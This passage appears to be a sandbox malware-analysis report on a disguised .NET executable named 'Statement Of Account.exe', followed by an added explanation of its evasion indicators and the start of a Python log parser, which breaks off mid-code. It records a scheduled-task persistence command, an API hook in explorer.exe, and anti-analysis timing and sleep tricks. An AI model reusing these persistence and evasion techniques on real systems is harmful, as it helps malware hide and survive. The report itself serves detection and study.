Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, uoIQEWIyxOpt3scd2T.cs High entropy of concatenated method names: 'q0c65vZu1H', 'lTh6ebi0b9', 'l5T6KLhHD3', 'tta6IraGW9', 'IRt6op2078', 'mwJ6yhIO7r', 'vwj6M2CwEQ', 'v9u6cEQGaY', 'uL26Fofc0L', 'tya6f8vOTy'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, Lh6ggwKHWj9TAIWXF7.cs High entropy of concatenated method names: 'bZTvW88oku', 'B2dvq6nDRs', 'dYWviVhG8n', 'lGRvD7C9SJ', 'msIvYjmoSw', 'cJbvuxMQR0', 'tuBvjL7PIo', 'DB1vGnChZg', 'wGEvmmajPa', 'gB1vaxe9Bb'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, c3OREwnQa3GNYU832f.cs High entropy of concatenated method names: 'EaXC2J1Xfr', 'q9PC0j1Kck', 'FR7CHFr0Yq', 'GKfC5vyv6g', 'cYYCRN9RVD', 'pieCeE21AL', 'XsQC8srmZf', 'xJJCKmrAax', 'N1MCIvjgZg', 'zSFCZjkWBc'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, eKk7ynaiv2Ji3kdDNx.cs High entropy of concatenated method names: 'bxqFskNs4A', 'J9gFLHpSnj', 'jpcFNWRTN6', 'hTuFggBc9P', 'jkeFvFY9Qr', 'R1DFTsoCBK', 'eKHFbg0uBg', 'wP7cjoMBvv', 'BBIcGdsMpL', 'jmDcmCqjoF'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, vaiTpIWP0Ndo0ZuNPf.cs High entropy of concatenated method names: 'CIlo3uUZUZ', 'C9doAcyHgg', 'TROoWBGsWm', 'CudoqFX6Q1', 'H8ToX9CNYF', 'y90o9Aw5ue', 'vseoJMmbmu', 'VWCoVvOFsG', 'aFsoPsXTUF', 'MXfoxfrLjf'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, h6IC2siSXaigkWxfxe.cs High entropy of concatenated method names: 'ToString', 'mn6ykMiSYS', 'mucyXXPffh', 'VnEy9UvwQp', 'hu7yJJjjyS', 'piAyV81VFy', 'eTyyPKh7j4', 'GBqyxI8Y4L', 'KhFypvEk8o', 'j8EyngdZ1j'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, taVahudoRs29QscL9X.cs High entropy of concatenated method names: 'vSe7KJ0EA2', 'waj7IRQ96c', 'GB47BX7vT7', 'HVS7XCJfIW', 'Q3w7JY2PRd', 'BSV7Vw2uBZ', 'Coo7xxFsvw', 'MM97pZdd8W', 'E4873BV1La', 'N717kAEdCD'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, FoLy8GswBljqbcaAATd.cs High entropy of concatenated method names: 'IO2F2vFQxi', 'GeSF0fhAIc', 'lI2FHDKJtR', 'aShF5GF4rh', 'n9mFRmsYhN', 'attFeXbRQ7', 'qaOF8gOZKj', 'jRfFKGpl92', 'AP4FIDSJok', 'qawFZXBVAy'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, vL6tORGBO4iNhhYxw5.cs High entropy of concatenated method names: 'lEUcgSVhVm', 'c1RcvQsPDR', 'NqLc6nZ1b9', 'DTWcTWbMZk', 'o6CcbG8qpS', 'GSxcCU9ntO', 'cQqclevKSr', 'eUbcEOyuIk', 'CiqcS7EQY0', 'gGactN4U3c'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, TtlxsAzSTRsL7Foskh.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DatF7wtdUY', 'fHNFoj4Gc6', 'sTvFyYjGqo', 'k9cFMSVY0l', 'gBwFcrAsyQ', 'bEDFFmGWmG', 'MM5FfmHqty'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, UZ9qWJD1Wm6HGuskXY.cs High entropy of concatenated method names: 'MuxMSRIqLf', 'eoAMt7Bf3x', 'ToString', 'z4ZMgtlE6w', 'qi8MvO2l3Q', 'M5SM6Oc8xJ', 'oEcMTp3ZPV', 'sU0MbiX6NP', 'uORMC1EheX', 'mghMlaaqJi'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, W7eOYc6mPKkSUdZ3uK.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm6vhmyEc8U', 'jPmhauc7Tw', 'iruhzclfhq', 'vKxLwVGDsP', 'JM3Ls5bQTN', 'KLwLh5M3fb', 'RgbLLgVK73', 'GxIJyZqufdqH2nZOs2A'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, lu1UrfsLPxGyI9Nnu1R.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wvGfWtnNM5', 'Lmhfq335DW', 'q4vfiq4ZXL', 'mXPfDpR7K3', 'M6efYX4oOZ', 'mVHfuybBbm', 'fFVfjwAtBj'
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, MnUDt3mjFUoMxNxTsw.cs High entropy of concatenated method names: 'wFBcBTIJfC', 'vFkcXDm3at', 'nlrc9wGx7x', 'WOGcJO0prD', 'J7DcW0lxRi', 'oo2cVoGcMv', 'Next', 'Next', 'Next', 'NextBytes'
Source: C:\Users\user\Desktop\Statement Of Account.exe File created: C:\Users\user\AppData\Roaming\SdYCcXyq.exe

Boot Survival

Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xED
Source: C:\Users\user\Desktop\Statement Of Account.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (identical entry repeated 43 times)
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
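
The listing above and the "Malware Analysis System Evasion" signatures that follow are machine-generated and dense; what an analyst wants from them is a handful of decoded facts. "Process information set: NOOPENFILEERRORBOX" is the sandbox's view of the process default hard-error mode, i.e. SetErrorMode(SEM_NOOPENFILEERRORBOX) (0x8000); cmstp.exe additionally sets SEM_NOGPFAULTERRORBOX (0x0002), so a crash in the injected code raises no dialog that would stall or expose it. The RDTSC interceptor pairs are six bytes apart (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc), the classic pattern that measures the cycle delta between two reads, which a hypervisor trap or single-stepping inflates. The delay value 922337203685477 ms is Int64.MaxValue in 100 ns ticks divided by 10000, an effectively infinite wait, and the per-thread totals in the "Thread sleep time" lines are exact multiples of it (x2, x7, x8). The write-watch reservations deserve a caveat: the .NET runtime's garbage collector reserves its heap segments with MEM_WRITE_WATCH, so on a .NET sample such as this one that line is expected runtime behaviour rather than evidence of evasion on its own. The Python below is an added example, not code from this report or from Joe Sandbox: it parses a constructed excerpt in the report's own line format and tallies these indicators per image. The helper names, and the reading of the sleep totals as summed maximal waits, are my assumptions.

```python
"""Parse Joe Sandbox behaviour lines and pull out the evasion-relevant facts.
Added example, not code from the report or from Joe Sandbox; SAMPLE_LOG is a
constructed excerpt in the report's line format and the helper names are mine."""
import re
from collections import Counter

# SetErrorMode flags (winbase.h). "Process information set: X | Y" is the
# sandbox's rendering of the process default hard-error mode these set.
SEM_FLAGS = {
    "FAILCRITICALERRORS": 0x0001,
    "NOGPFAULTERRORBOX": 0x0002,     # no crash dialog on an unhandled fault
    "NOALIGNMENTFAULTEXCEPT": 0x0004,
    "NOOPENFILEERRORBOX": 0x8000,    # no "file not found" dialog
}

# Int64.MaxValue in 100 ns ticks, converted to milliseconds:
# 9223372036854775807 // 10000 == 922337203685477 (about 29,000 years).
INFINITE_SLEEP_MS = (2**63 - 1) // 10_000

# Constructed excerpt: one line of each kind seen in the report.
SAMPLE_LOG = r"""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
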